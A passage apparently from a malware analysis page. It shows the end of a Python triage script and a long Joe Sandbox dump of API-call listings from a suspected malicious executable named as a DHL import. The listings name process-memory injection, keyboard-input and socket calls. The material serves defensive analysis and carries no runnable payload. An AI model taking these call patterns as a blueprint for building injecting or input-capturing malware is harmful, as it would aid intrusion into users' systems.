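    return findings

# Copied (abridged) from three entries on this page; embedded only so the script runs offline.
SAMPLE_LISTING = """APIs
• GetDC.USER32(00000000), ref: 008509A4
• GetPixel.GDI32(00000000,?,00000003), ref: 008509B0
• API ID: Window$ForegroundPixelRelease
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 0083E997
• QueryPerformanceFrequency.KERNEL32(?), ref: 0083E9A5
• Sleep.KERNEL32(00000000), ref: 0083E9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 0083E9B7
• Sleep.KERNEL32 ref: 0083E9F3
• API ID: PerformanceQuery$CounterSleep$Frequency
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083102A
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831062
• API ID: HeapInformationToken$AllocErrorLastProcess
"""
```

`triage(SAMPLE_LISTING)` returns one `timing-check` and one `screen-pixel-sampling` finding keyed by the entry's API ID, plus a `token-class-label-mismatch` for each GetTokenInformation call; feed it the text of a full report export to run the same rules over every function entry.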
                                                                                          APIs
                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083102A
                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00831036
                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831045
                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0083104C
                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831062
                                                                                          Similarity
                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 44706859-0
                                                                                          APIs
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840324
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840331
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 0084033E
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 0084034B
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840358
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840365
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0080D752
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 0080D764
                                                                                          • _free.LIBCMT ref: 0080D776
                                                                                          • _free.LIBCMT ref: 0080D788
                                                                                          • _free.LIBCMT ref: 0080D79A
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00835C58
                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00835C6F
                                                                                          • MessageBeep.USER32(00000000), ref: 00835C87
                                                                                          • KillTimer.USER32(?,0000040A), ref: 00835CA3
                                                                                          • EndDialog.USER32(?,00000001), ref: 00835CBD
                                                                                          Similarity
                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3741023627-0
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 008022BE
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 008022D0
                                                                                          • _free.LIBCMT ref: 008022E3
                                                                                          • _free.LIBCMT ref: 008022F4
                                                                                          • _free.LIBCMT ref: 00802305
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          APIs
                                                                                          • EndPath.GDI32(?), ref: 007E95D4
                                                                                          • StrokeAndFillPath.GDI32(?,?,008271F7,00000000,?,?,?), ref: 007E95F0
                                                                                          • SelectObject.GDI32(?,00000000), ref: 007E9603
                                                                                          • DeleteObject.GDI32 ref: 007E9616
                                                                                          • StrokePath.GDI32(?), ref: 007E9631
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                          • String ID:
                                                                                          • API String ID: 2625713937-0
                                                                                          Similarity
                                                                                          • API ID: __freea$_free
                                                                                          • String ID: a/p$am/pm
                                                                                          • API String ID: 3432400110-3206640213
                                                                                          APIs
                                                                                            • Part of subcall function 007F0242: EnterCriticalSection.KERNEL32(008A070C,008A1884,?,?,007E198B,008A2518,?,?,?,007D12F9,00000000), ref: 007F024D
                                                                                            • Part of subcall function 007F0242: LeaveCriticalSection.KERNEL32(008A070C,?,007E198B,008A2518,?,?,?,007D12F9,00000000), ref: 007F028A
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 007F00A3: __onexit.LIBCMT ref: 007F00A9
                                                                                          • __Init_thread_footer.LIBCMT ref: 00857BFB
                                                                                            • Part of subcall function 007F01F8: EnterCriticalSection.KERNEL32(008A070C,?,?,007E8747,008A2514), ref: 007F0202
                                                                                            • Part of subcall function 007F01F8: LeaveCriticalSection.KERNEL32(008A070C,?,007E8747,008A2514), ref: 007F0235
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                          • String ID: 5$G$Variable must be of type 'Object'.
                                                                                          • API String ID: 535116098-3733170431
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: JO}
                                                                                          • API String ID: 0-3675885391
                                                                                          APIs
                                                                                            • Part of subcall function 0083B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008321D0,?,?,00000034,00000800,?,00000034), ref: 0083B42D
                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00832760
                                                                                            • Part of subcall function 0083B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0083B3F8
                                                                                            • Part of subcall function 0083B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0083B355
                                                                                            • Part of subcall function 0083B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00832194,00000034,?,?,00001004,00000000,00000000), ref: 0083B365
                                                                                            • Part of subcall function 0083B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00832194,00000034,?,?,00001004,00000000,00000000), ref: 0083B37B
                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008327CD
                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0083281A
                                                                                          Similarity
                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                          • String ID: @
                                                                                          • API String ID: 4150878124-2766056989
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe,00000104), ref: 00801769
                                                                                          • _free.LIBCMT ref: 00801834
                                                                                          • _free.LIBCMT ref: 0080183E
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
                                                                                          • API String ID: 2506810119-655734387
                                                                                          APIs
                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0083C306
                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0083C34C
                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008A1990,00D95280), ref: 0083C395
                                                                                          Similarity
                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                          • String ID: 0
                                                                                          • API String ID: 135850232-4108050209
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0086CC08,00000000,?,?,?,?), ref: 008644AA
                                                                                          • GetWindowLongW.USER32 ref: 008644C7
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008644D7
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID: SysTreeView32
                                                                                          • API String ID: 847901565-1698111956
                                                                                          APIs
                                                                                            • Part of subcall function 0085335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00853077,?,?), ref: 00853378
                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
                                                                                          • _wcslen.LIBCMT ref: 0085309B
                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00853106
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                          • String ID: 255.255.255.255
                                                                                          • API String ID: 946324512-2422070025
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00863F40
                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00863F54
                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00863F78
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window
                                                                                          • String ID: SysMonthCal32
                                                                                          • API String ID: 2326795674-1439706946
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00864705
                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00864713
                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0086471A
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                          • String ID: msctls_updown32
                                                                                          • API String ID: 4014797782-2298589950
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                          • API String ID: 176396367-2734436370
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00863840
                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00863850
                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00863876
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00844A08
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00844A5C
• SetErrorMode.KERNEL32(00000000,?,?,0086CC08), ref: 00844AD0
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0086424F
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00864264
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00864271
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
  • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
  • Part of subcall function 00832DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00832DC5
  • Part of subcall function 00832DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00832DD6
  • Part of subcall function 00832DA7: GetCurrentThreadId.KERNEL32 ref: 00832DDD
  • Part of subcall function 00832DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00832DE4
• GetFocus.USER32 ref: 00832F78
  • Part of subcall function 00832DEE: GetParent.USER32(00000000), ref: 00832DF9
• GetClassNameW.USER32(?,?,00000100), ref: 00832FC3
• EnumChildWindows.USER32(?,0083303B), ref: 00832FEB
Strings
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008658C1
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008658EE
• DrawMenuBar.USER32(?), ref: 008658FD
Strings
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
APIs
Similarity
• API ID: Variant$ClearInitInitializeUninitialize
• String ID:
• API String ID: 1998397398-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0086FC08,?), ref: 008305F0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0086FC08,?), ref: 00830608
• CLSIDFromProgID.OLE32(?,?,00000000,0086CC40,000000FF,?,00000000,00000800,00000000,?,0086FC08,?), ref: 0083062D
• _memcmp.LIBVCRUNTIME ref: 0083064E
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• GetWindowRect.USER32(00D8BFE8,?), ref: 008662E2
• ScreenToClient.USER32(?,?), ref: 00866315
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00866382
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                          • String ID:
                                                                                          • API String ID: 3880355969-0
                                                                                          • Opcode ID: 38c78445c54d124dc2c67dd8a25814032971e7dd8dfc2d4c14dfb09194a9c322
                                                                                          • Instruction ID: 7059feeaeac48e56fc6d2f0eee7134c1b34703c584bce9142caef63ed708bd68
                                                                                          • Opcode Fuzzy Hash: 38c78445c54d124dc2c67dd8a25814032971e7dd8dfc2d4c14dfb09194a9c322
                                                                                          • Instruction Fuzzy Hash: 96515A70A00249EFDF10DF68D9809AE7BB5FB45364F11815AF815DB390E730AD91CB50
                                                                                          APIs
                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00851AFD
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851B0B
                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00851B8A
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851B94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$socket
                                                                                          • String ID:
                                                                                          • API String ID: 1881357543-0
                                                                                          • Opcode ID: e5d421a671162574d2c98bc85cec6964e09a59fdb58356e200da381e88bb86c6
                                                                                          • Instruction ID: 396804fe844967c5886d798f12f0c672338979d39c3cb83a78d6565f65bab624
                                                                                          • Opcode Fuzzy Hash: e5d421a671162574d2c98bc85cec6964e09a59fdb58356e200da381e88bb86c6
                                                                                          • Instruction Fuzzy Hash: 3241D334600200AFEB20AF24C88AF2977E5EB49718F548458F95A9F3D3D7B6ED41CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c18317c6e2f875d49f166705c40ffe4310e0ab5a13c25104c4974adfe57aca8
                                                                                          • Instruction ID: 6a65ac2818a85c865bf10eb9c230806fe118bcf0a397871c4df15bc0f214f1eb
                                                                                          • Opcode Fuzzy Hash: 9c18317c6e2f875d49f166705c40ffe4310e0ab5a13c25104c4974adfe57aca8
                                                                                          • Instruction Fuzzy Hash: 61410672A00708AFD7249F7CCC45BAEBBA9FF88710F10856AF145DB2D2D7719A418781
                                                                                          APIs
                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00845783
                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 008457A9
                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008457CE
                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008457FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 3321077145-0
                                                                                          • Opcode ID: 46fd6d61122afa6e2c1d0af601e992331469d6c6434bce9003a30c8040e62a9a
                                                                                          • Instruction ID: bd3dd247817aee64446702457546250015bbb6c31945ddc4421018f279d18574
                                                                                          • Opcode Fuzzy Hash: 46fd6d61122afa6e2c1d0af601e992331469d6c6434bce9003a30c8040e62a9a
                                                                                          • Instruction Fuzzy Hash: 7E41F439600615DFCB15EF15C548A5EBBF2EF89720B198499EC4AAB362DB34ED00CB91
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,007F6D71,00000000,00000000,007F82D9,?,007F82D9,?,00000001,007F6D71,8BE85006,00000001,007F82D9,007F82D9), ref: 0080D910
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0080D999
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0080D9AB
                                                                                          • __freea.LIBCMT ref: 0080D9B4
                                                                                            • Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                          • String ID:
                                                                                          • API String ID: 2652629310-0
                                                                                          • Opcode ID: 63dc76da0ef2f65c5222892e8aa669718ff9f32375747eb1773565015e38d68a
                                                                                          • Instruction ID: f4923856bf0d8e1d67ce15505fb96eebdce8a53473e4eebe546a93a2b7ccc2a4
                                                                                          • Opcode Fuzzy Hash: 63dc76da0ef2f65c5222892e8aa669718ff9f32375747eb1773565015e38d68a
                                                                                          • Instruction Fuzzy Hash: D631AD72A0020AABDF24DFA5DC45EBE7BA5FB41310B054168FC04DA291EB35DD51CBA0
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00865352
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00865375
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00865382
                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008653A8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 3340791633-0
                                                                                          • Opcode ID: 91c12d4f76fd58f206adf29dbb27609bc5980673ef54e8405fe6ee899808010a
                                                                                          • Instruction ID: 0d10227da7d1e6b8dd7c67bbd86ad97aabb0c7928817d19b84984f3236ed3cb5
                                                                                          • Opcode Fuzzy Hash: 91c12d4f76fd58f206adf29dbb27609bc5980673ef54e8405fe6ee899808010a
                                                                                          • Instruction Fuzzy Hash: 8B31D034A55A0CEFEF309E14CE1ABE97761FB06B90F5A4102FA11DA3E0C7B099409B42
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0083ABF1
                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0083AC0D
                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0083AC74
                                                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0083ACC6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                          • String ID:
                                                                                          • API String ID: 432972143-0
                                                                                          • Opcode ID: 2d6974bbe1a211c3f2aee5f6af1f02fca918b171b88f893cd9ea6ae390a62000
                                                                                          • Instruction ID: 56fbe5f04fdd39d8a998f7e0c643f5cdcc32cad9ae0a11d8f25f45cb97dda318
                                                                                          • Opcode Fuzzy Hash: 2d6974bbe1a211c3f2aee5f6af1f02fca918b171b88f893cd9ea6ae390a62000
                                                                                          • Instruction Fuzzy Hash: 4E31E530A04618AFEB298B65C8087FA7AA5FBC5710F04621AE4C5D61D1C3758D8687D2
                                                                                          APIs
                                                                                          • ClientToScreen.USER32(?,?), ref: 0086769A
                                                                                          • GetWindowRect.USER32(?,?), ref: 00867710
                                                                                          • PtInRect.USER32(?,?,00868B89), ref: 00867720
                                                                                          • MessageBeep.USER32(00000000), ref: 0086778C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1352109105-0
                                                                                          • Opcode ID: de8a30ec417922fd22f89abc7f5c4d4cd2ef302ce14bdc63778e27131771bf5c
                                                                                          • Instruction ID: d627f47bd7fb16bbe072d6e8ddf6f5555d8cf7ecb015cc586aa4f0c988c49c2b
                                                                                          • Opcode Fuzzy Hash: de8a30ec417922fd22f89abc7f5c4d4cd2ef302ce14bdc63778e27131771bf5c
                                                                                          • Instruction Fuzzy Hash: 1E418D34605254DFEB02CF58C898EA9BBF5FB49318F1A80A9E415DB261D730A941CFD0
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 008616EB
                                                                                            • Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
                                                                                            • Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
                                                                                            • Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65
                                                                                          • GetCaretPos.USER32(?), ref: 008616FF
                                                                                          • ClientToScreen.USER32(00000000,?), ref: 0086174C
                                                                                          • GetForegroundWindow.USER32 ref: 00861752
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
